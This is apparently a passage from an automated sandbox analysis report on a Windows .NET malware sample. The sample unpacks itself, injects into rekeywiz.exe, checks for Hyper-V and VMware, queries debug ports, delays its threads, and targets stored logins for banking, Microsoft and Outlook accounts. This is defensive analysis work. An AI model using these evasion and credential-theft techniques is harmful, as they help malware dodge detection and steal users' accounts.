                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\hh01FRs81x.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: hh01FRs81x.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hh01FRs81x.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: hh01FRs81x.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: IfzV.pdb source: hh01FRs81x.exe
                Source: Binary string: rekeywiz.pdb source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IfzV.pdbSHA256u source: hh01FRs81x.exe
                Source: Binary string: wntdll.pdb source: hh01FRs81x.exe, hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rekeywiz.pdbGCTL source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335000308.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388624371.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp

                Data Obfuscation

                Source: 0.2.hh01FRs81x.exe.3766d20.2.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.5e00000.4.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.cs .Net Code: AKgumPX4JkoEtf9LENJ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.284f804.0.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 0_2_05CBC258 push eax; mov dword ptr [esp], edx 0_2_05CBE4C9
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 0_2_05DF5ABC push esp; retf 0_2_05DF5ABD
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_00401270 push ebp; iretd 4_2_00401372
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_0040DB31 push eax; ret 4_2_0040DB32
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_0041ABF3 push edi; retf 4_2_0041ABFC
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_00414BF3 push ecx; iretd 4_2_00414C4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_004014CD push ebp; iretd 4_2_004014D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_004034D0 push eax; ret 4_2_004034D2
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_004074FB push ecx; iretd 4_2_004074FE
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_00414D4F push ebx; iretd 4_2_00414E35
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_00414DDB push ebx; iretd 4_2_00414E35
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_00414E3E push ebx; retf 4_2_00414E47
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_004086CC push es; iretd 4_2_004086CF
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_004016AE push ebp; iretd 4_2_004016B1
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_0041772D push esi; iretd 4_2_00417730
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_0163225F pushad ; ret 4_2_016327F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_016327FA pushad ; ret 4_2_016327F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_016609AD push ecx; mov dword ptr [esp], ecx 4_2_016609B6
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_0163283D push eax; iretd 4_2_01632858
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_046927FA pushad ; ret 7_2_046927F9
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_0469225F pushad ; ret 7_2_046927F9
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_0469283D push eax; iretd 7_2_04692858
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_046C09AD push ecx; mov dword ptr [esp], ecx 7_2_046C09B6
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006D4028 push ecx; iretd 7_2_006D402B
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006D51F9 push es; iretd 7_2_006D51FC
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006E425A push esi; iretd 7_2_006E425D
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006DE388 push ebx; retf 7_2_006DE394
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006E0690 push es; ret 7_2_006E06C1
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006E1720 push ecx; iretd 7_2_006E1778
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006E7720 push edi; retf 7_2_006E7729
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006E187C push ebx; iretd 7_2_006E1962
                Source: hh01FRs81x.exe Static PE information: section name: .text entropy: 7.729265166902141
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, multiple .cs classes: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rekeywiz.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: hh01FRs81x.exe PID: 7132, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\rekeywiz.exe API/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: 8C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: 2620000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: 2420000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: 9AD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: 8370000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: AAD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Memory allocated: BAD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Code function: 4_2_017321AE rdtsc 4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\rekeywiz.exe Window / User API: threadDelayed 3057
                Source: C:\Windows\SysWOW64\rekeywiz.exe Window / User API: threadDelayed 6915
                Source: C:\Users\user\Desktop\hh01FRs81x.exe API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\rekeywiz.exe API coverage: 3.0 %
                Source: C:\Users\user\Desktop\hh01FRs81x.exe TID: 6324 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532 Thread sleep count: 3057 > 30
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532 Thread sleep time: -6114000s >= -30000s
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532 Thread sleep count: 6915 > 30
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532 Thread sleep time: -13830000s >= -30000s
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420 Thread sleep time: -52500s >= -30000s
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420 Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\rekeywiz.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\rekeywiz.exe Code function: 7_2_006EC780 FindFirstFileW,FindNextFileW,FindClose, 7_2_006EC780
                Source: 4Fr641e5.7.dr Binary or memory string: global block list test formVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
                Source: 4Fr641e5.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Ir*Hyper-V Dynamic Memory Integration Service
                Source: firefox.exe, 0000000F.00000002.1615012169.0000017B6C24D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLLo
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
                Source: 4Fr641e5.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 4Fr641e5.7.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Ir!Hyper-V Virtual Machine Bus Pipes
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Ir!Hyper-V Hypervisor Root Partition
                Source: 4Fr641e5.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 4Fr641e5.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 4Fr641e5.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 4Fr641e5.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
                Source: 4Fr641e5.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 4Fr641e5.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 4Fr641e5.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V dsrdspodmyaiqki Bus Pipes
                Source: 4Fr641e5.7.dr Binary or memory string: discord.comVMware20,11696497155f
                Source: 4Fr641e5.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.955797478.0000000004E78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor|
                Source: 4Fr641e5.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 4Fr641e5.7.dr Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Ir$Hyper-V Hypervisor Logical Processor
                Source: 4Fr641e5.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 4Fr641e5.7.dr Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: 4Fr641e5.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004ED6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Servicel
                Source: 4Fr641e5.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 4Fr641e5.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 4Fr641e5.7.dr Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: hh01FRs81x.exe, 00000000.00000002.955797478.0000000004E78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid PartitionN
                Source: 4Fr641e5.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: rekeywiz.exe, 00000007.00000002.3334449717.00000000007F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+'
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3335601480.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4Fr641e5.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 4Fr641e5.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                Source: 4Fr641e5.7.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 4Fr641e5.7.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir)Hyper-V Hypervisor Root Virtual Processor
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dsrdspodmyaiqki Bus
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                Source: 4Fr641e5.7.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 4Fr641e5.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 4Fr641e5.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rekeywiz.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Code function: 4_2_017321AE rdtsc 4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Code function: 4_2_00417BB3 LdrLoadDll, 4_2_00417BB3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC460 mov ecx, dword ptr fs:[00000030h]4_2_016EC460
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168A470 mov eax, dword ptr fs:[00000030h]4_2_0168A470
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168A470 mov eax, dword ptr fs:[00000030h]4_2_0168A470
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168A470 mov eax, dword ptr fs:[00000030h]4_2_0168A470
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171A456 mov eax, dword ptr fs:[00000030h]4_2_0171A456
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E443 mov eax, dword ptr fs:[00000030h]4_2_0169E443
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168245A mov eax, dword ptr fs:[00000030h]4_2_0168245A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165645D mov eax, dword ptr fs:[00000030h]4_2_0165645D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165C427 mov eax, dword ptr fs:[00000030h]4_2_0165C427
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165E420 mov eax, dword ptr fs:[00000030h]4_2_0165E420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165E420 mov eax, dword ptr fs:[00000030h]4_2_0165E420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165E420 mov eax, dword ptr fs:[00000030h]4_2_0165E420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6420 mov eax, dword ptr fs:[00000030h]4_2_016E6420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698402 mov eax, dword ptr fs:[00000030h]4_2_01698402
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698402 mov eax, dword ptr fs:[00000030h]4_2_01698402
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698402 mov eax, dword ptr fs:[00000030h]4_2_01698402
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016604E5 mov ecx, dword ptr fs:[00000030h]4_2_016604E5
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016664AB mov eax, dword ptr fs:[00000030h]4_2_016664AB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016944B0 mov ecx, dword ptr fs:[00000030h]4_2_016944B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EA4B0 mov eax, dword ptr fs:[00000030h]4_2_016EA4B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171A49A mov eax, dword ptr fs:[00000030h]4_2_0171A49A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668770 mov eax, dword ptr fs:[00000030h]4_2_01668770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670770 mov eax, dword ptr fs:[00000030h]4_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov esi, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov eax, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov eax, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE75D mov eax, dword ptr fs:[00000030h]4_2_016EE75D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660750 mov eax, dword ptr fs:[00000030h]4_2_01660750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2750 mov eax, dword ptr fs:[00000030h]4_2_016A2750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2750 mov eax, dword ptr fs:[00000030h]4_2_016A2750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C720 mov eax, dword ptr fs:[00000030h]4_2_0169C720
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C720 mov eax, dword ptr fs:[00000030h]4_2_0169C720
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov eax, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov ecx, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov eax, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DC730 mov eax, dword ptr fs:[00000030h]4_2_016DC730
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C700 mov eax, dword ptr fs:[00000030h]4_2_0169C700
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660710 mov eax, dword ptr fs:[00000030h]4_2_01660710
